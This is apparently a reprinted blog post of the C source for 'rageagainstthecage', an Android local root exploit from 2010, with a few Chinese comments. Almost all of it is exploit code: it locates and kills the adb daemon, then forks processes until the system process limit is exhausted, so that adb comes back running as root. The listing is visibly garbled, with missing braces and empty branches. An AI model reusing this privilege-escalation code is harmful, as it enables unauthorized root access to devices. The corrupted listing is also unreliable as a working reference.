rageagainstthecage 源代码

#include <stdio.h> 
#include <sys/types.h> 
#include <sys/time.h> 
#include <sys/resource.h> 
#include <unistd.h> 
#include <fcntl.h> 
#include <errno.h> 
#include <string.h> 
#include <signal.h> 
#include <stdlib.h> 
void die(const char *msg) 


pid_t find_adb() 

    char buf[256]; 
    int i = 0, fd = 0; 
    pid_t found = 0;    //初始化为0,如果没有找到adb将一直保持0值 
    for (i = 0; i < 32000; ++i)  
        sprintf(buf, "/proc/%d/cmdline", i); 
        if ((fd = open(buf, O_RDONLY)) < 0) 
          //end if 
        memset(buf, 0, sizeof(buf)); 
        read(fd, buf, sizeof(buf) - 1); 
        if (strstr(buf, "/sbin/adb"))  
            found = i; 
          //end if 
      //end for 
    return found; 

void restart_adb(pid_t pid) 

    //直接杀死进程(sig = SIGKILL) 
    kill(pid, 9); 

void wait_for_root_adb(pid_t old_adb) 

    pid_t p = 0; 
    for (;;)  
        p = find_adb(); 
        if (p != 0 && p != old_adb) 
      //end for 
    kill(-1, 9); 

int main(int argc, char **argv) 

    pid_t adb_pid = 0, p; 
    int pids = 0, new_pids = 1; 
    int pepe[2]; 
    char c = 0; 
    struct rlimit rl; 
    printf(" CVE-2010-EASY Android local root exploit (C) 2010 by 743C\n\n"); 
    printf(" checking NPROC limit ...\n"); 
    if (getrlimit(RLIMIT_NPROC, &rl) < 0) 
        die("[-] getrlimit"); 
    if (rl.rlim_cur == RLIM_INFINITY)  
        printf("[-] No RLIMIT_NPROC set. Exploit would just crash machine. Exiting.\n"); 
    printf("[+] RLIMIT_NPROC={%lu, %lu}\n", rl.rlim_cur, rl.rlim_max); 
    printf(" Searching for adb ...\n"); 
    adb_pid = find_adb(); 
    if (!adb_pid) 
        die("[-] Cannot find adb"); 
    printf("[+] Found adb as PID %d\n", adb_pid); 
    printf(" Spawning children. Dont type anything and wait for reset!\n"); 
    printf("\n If you like what we are doing you can send us PayPal money to\n" 
           " 7-4-3-C@web.de so we can compensate time, effort and HW costs.\n" 
           " If you are a company and feel like you profit from our work,\n" 
           " we also accept donations > 1000 USD!\n"); 
    printf("\n adb connection will be reset. restart adb server on desktop and re-login.\n"); 
    if (fork() > 0) 
    if (fork() == 0)  
        for (;;)  
            if ((p = fork()) == 0)  
            else if (p < 0)     //创建进程失败,说明已达到进程数最大值 
                if (new_pids)  
                    printf("\n[+] Forked %d childs.\n", pids); 
                    new_pids = 0; 
                    write(pepe[1], &c, 1); 
    read(pepe[0], &c, 1); 
    if (fork() == 0)  
        for (;;) 
    return 0; 

posted on 2014-02-20 14:36  Kuloud  阅读(278)  评论(0编辑  收藏  举报